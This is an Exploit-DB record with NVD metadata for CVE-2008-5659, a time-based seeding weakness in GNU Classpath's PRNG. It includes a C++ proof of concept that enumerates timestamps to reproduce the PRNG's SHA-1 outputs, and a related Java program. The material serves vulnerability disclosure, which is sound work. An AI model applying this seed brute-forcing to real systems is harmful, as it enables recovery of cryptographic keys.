GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness 2
2008-12-05T00:00:00
ID EDB-ID:32674 Type exploitdb Reporter Jack Lloyd Modified 2008-12-05T00:00:00
Description
GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2). CVE-2008-5659. Remote exploits for multiple platform
source: http://www.securityfocus.com/bid/32909/info
GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.
Attackers may leverage this issue to obtain sensitive information that can lead to further attacks.
Classpath 0.97.2 is vulnerable; other versions may also be affected.
#include <botan/init.h>
#include <botan/sha160.h>
#include <botan/loadstor.h>
using namespace Botan;
#include <cstdlib>
#include <ctime>
int main(int argc, char* argv[])
{
Botan::LibraryInitializer init;
// by default start with a guess of 1 minute ago
u64bit time_guess = (std::time(0) - 60);
time_guess *= 1000; // convert to ms
u32bit how_many = 60000; // 60 second range by default
if(argc >= 2)
how_many = std::atoi(argv[1]);
if(argc >= 3)
time_guess = std::atoi(argv[2]);
//printf("Starting from %lld up to %d\n", time_guess, how_many);
SHA_160 sha;
byte buf[8], hash[40];
for(u32bit i = 0; i != how_many; ++i)
{
Botan::store_be(time_guess, buf);
// First block
sha.update(buf, sizeof(buf));
sha.final(hash);
sha.update(buf, sizeof(buf));
sha.update(hash, 20); // previous output
sha.final(hash + 20);
/*
printf("seed=%lld hash=", time_guess);
for(u32bit j = 0; j != sizeof(hash); ++j)
printf("%02X", hash[j]);
printf("\n");
*/
++time_guess; // move to next ms
}
}
{"id": "EDB-ID:32674", "type": "exploitdb", "bulletinFamily": "exploit", "title": "GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness 2", "description": "GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2). CVE-2008-5659. Remote exploits for multiple platform", "published": "2008-12-05T00:00:00", "modified": "2008-12-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/32674/", "reporter": "Jack Lloyd", "references": [], "cvelist": ["CVE-2008-5659"], "lastseen": "2016-02-03T17:33:42", "viewCount": 3, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-03T17:33:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5659"]}, {"type": "exploitdb", "idList": ["EDB-ID:32673"]}], "modified": "2016-02-03T17:33:42", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/32674/", "sourceData": "source: http://www.securityfocus.com/bid/32909/info\r\n \r\nGNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.\r\n \r\nAttackers may leverage this issue to obtain sensitive information that can lead to further attacks.\r\n \r\nClasspath 0.97.2 is vulnerable; other versions may also be affected. \r\n\r\n#include <botan/init.h>\r\n#include <botan/sha160.h>\r\n#include <botan/loadstor.h>\r\nusing namespace Botan;\r\n\r\n#include <cstdlib>\r\n#include <ctime>\r\n\r\nint main(int argc, char* argv[])\r\n {\r\n Botan::LibraryInitializer init;\r\n\r\n // by default start with a guess of 1 minute ago\r\n u64bit time_guess = (std::time(0) - 60);\r\n time_guess *= 1000; // convert to ms\r\n u32bit how_many = 60000; // 60 second range by default\r\n\r\n if(argc >= 2)\r\n how_many = std::atoi(argv[1]);\r\n if(argc >= 3)\r\n time_guess = std::atoi(argv[2]);\r\n\r\n //printf(\"Starting from %lld up to %d\\n\", time_guess, how_many);\r\n\r\n SHA_160 sha;\r\n\r\n byte buf[8], hash[40];\r\n\r\n for(u32bit i = 0; i != how_many; ++i)\r\n {\r\n Botan::store_be(time_guess, buf);\r\n\r\n // First block\r\n sha.update(buf, sizeof(buf));\r\n sha.final(hash);\r\n\r\n sha.update(buf, sizeof(buf));\r\n sha.update(hash, 20); // previous output\r\n sha.final(hash + 20);\r\n /*\r\n printf(\"seed=%lld hash=\", time_guess);\r\n for(u32bit j = 0; j != sizeof(hash); ++j)\r\n printf(\"%02X\", hash[j]);\r\n printf(\"\\n\");\r\n */\r\n ++time_guess; // move to next ms\r\n }\r\n }\r\n", "osvdbidlist": ["53101"]}
{"cve": [{"lastseen": "2020-12-09T19:28:27", "description": "The gnu.java.security.util.PRNG class in GNU Classpath 0.97.2 and earlier uses a predictable seed based on the system time, which makes it easier for context-dependent attackers to conduct brute force attacks against cryptographic routines that use this class for randomness, as demonstrated against DSA private keys.", "edition": 5, "cvss3": {}, "published": "2008-12-17T20:30:00", "title": "CVE-2008-5659", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5659"], "modified": "2017-08-08T01:33:00", "cpe": ["cpe:/a:gnu:classpath:0.97", "cpe:/a:gnu:classpath:0.97.2", "cpe:/a:gnu:classpath:0.6", "cpe:/a:gnu:classpath:0.92", "cpe:/a:gnu:classpath:0.12", "cpe:/a:gnu:classpath:0.95", "cpe:/a:gnu:classpath:0.11", "cpe:/a:gnu:classpath:0.15", "cpe:/a:gnu:classpath:0.7", "cpe:/a:gnu:classpath:0.97.1", "cpe:/a:gnu:classpath:0.13", "cpe:/a:gnu:classpath:0.17", "cpe:/a:gnu:classpath:0.16", "cpe:/a:gnu:classpath:0.9", "cpe:/a:gnu:classpath:0.20", "cpe:/a:gnu:classpath:0.93", "cpe:/a:gnu:classpath:0.91", "cpe:/a:gnu:classpath:0.10", "cpe:/a:gnu:classpath:0.8", "cpe:/a:gnu:classpath:0.14", "cpe:/a:gnu:classpath:0.96.1", "cpe:/a:gnu:classpath:0.19", "cpe:/a:gnu:classpath:0.90", "cpe:/a:gnu:classpath:0.18", "cpe:/a:gnu:classpath:0.96"], "id": "CVE-2008-5659", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5659", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:classpath:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.93:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.97:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.12:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.19:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.97.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.97.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.18:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.96.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:classpath:0.96:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T17:33:33", "description": "GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1). CVE-2008-5659. Remote exploits for multiple platform", "published": "2008-12-05T00:00:00", "type": "exploitdb", "title": "GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5659"], "modified": "2008-12-05T00:00:00", "id": "EDB-ID:32673", "href": "https://www.exploit-db.com/exploits/32673/", "sourceData": "source: http://www.securityfocus.com/bid/32909/info\r\n\r\nGNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.\r\n\r\nAttackers may leverage this issue to obtain sensitive information that can lead to further attacks.\r\n\r\nClasspath 0.97.2 is vulnerable; other versions may also be affected. \r\n\r\nimport gnu.java.security.util.PRNG;\r\n\r\nclass PRNGTest {\r\n public static void main(String args[])\r\n {\r\n long t = System.currentTimeMillis();\r\n\r\n System.out.println(\"Time in ms is \" + t);\r\n\r\n PRNG prng = PRNG.getInstance();\r\n\r\n byte buffer[] = new byte[40];\r\n\r\n prng.nextBytes(buffer, 0, buffer.length);\r\n\r\n for(int i = 0; i != buffer.length; ++i)\r\n {\r\n // There must be an easier way to do this (right?)\r\n int intval = buffer[i];\r\n\r\n if(intval <= 0)\r\n intval += 256;\r\n\r\n String s = Integer.toHexString(intval);\r\n\r\n if(s.length() == 1)\r\n s = \"0\" + s;\r\n\r\n System.out.print(s);\r\n }\r\n System.out.println(\"\");\r\n }\r\n };\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32673/"}]}
